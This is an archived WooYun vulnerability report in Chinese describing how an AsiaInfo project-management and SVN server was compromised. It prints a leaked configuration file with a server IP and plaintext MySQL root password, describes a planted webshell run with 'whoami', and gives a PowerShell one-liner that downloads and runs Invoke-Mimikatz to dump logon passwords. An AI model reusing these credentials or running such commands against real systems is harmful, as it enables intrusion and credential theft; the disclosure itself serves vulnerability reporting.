当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191278

漏洞标题:亚信一台svn服务器沦陷大量源代码泄露

相关厂商:亚信科技

漏洞作者: niexinming

提交时间:2016-04-02 12:55

修复时间:2016-05-17 20:10

公开时间:2016-05-17 20:10

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-02: 细节已通知厂商并且等待厂商处理中
2016-04-02: 厂商已经确认,细节仅向厂商公开
2016-04-12: 细节向核心白帽子及相关领域专家公开
2016-04-22: 细节向普通白帽子公开
2016-05-02: 细节向实习白帽子公开
2016-05-17: 细节向公众公开

简要描述:

搞安全的被搞,真可谓,常在河边走哪有不湿身

详细说明:

首先在这个ip:
http://182.92.105.50
不仅有工作管理平台,还有这个平台的压缩包,http://182.92.105.50/zt-b.zip
果断下载之后发现一个配置文件:

<?php
$config->installed       = true;
$config->debug           = false;
$config->requestType     = 'GET';
$config->db->host        = '182.92.105.50';
$config->db->port        = '3306';
$config->db->name        = 'zentao';
$config->db->user        = 'root';
$config->db->password    = 'asiainfo_3306';
$config->db->prefix      = 'zt_';
$config->webRoot         = getWebRoot();
$config->default->lang   = 'zh-cn';
$config->mysqldump       = 'D:\work\programFiles\mysql-5.5.28-win32\mysqlServer\bin\mysqldump.exe';


然后登陆mysql,看看数据库的数据:

yaxin4.png


然后通过:http://182.92.105.50/zt/module/admin/control.php
发现:服务的绝对路径:
Fatal error: Class 'control' not found in D:\work\programFiles\Apache2.2\htdocs\zt\module\admin\control.php on line 12
果断在服务器上写了个执行系统指令的小马,然后在访问之后:
http://182.92.105.50/zt/tmp/model/cc.php?cc=whoami
发现是:
nt authority\system
而且开了3389端口
然后开了一个新账户,登陆账户账户之后用powershell的指令脱下密码:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –command sekurlsa::logonpasswords


yaxin1.png


yaxin2.png


然后发现一个svn的服务端:

yaxin5.png


漏洞证明:

发现svn的端口是9999
在服务器开了一账户:
然后用浏览器访问:

yaxin6.png


yaxin7.png

修复方案:

删除源代码包,关闭不必要的端口,php降权

版权声明:转载请注明来源 niexinming@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-04-02 20:08

厂商回复:

非常感谢漏洞发现者的提醒!

最新状态:

2016-04-02:现场经分系统测试代码,没有影响核心代码和客户数据。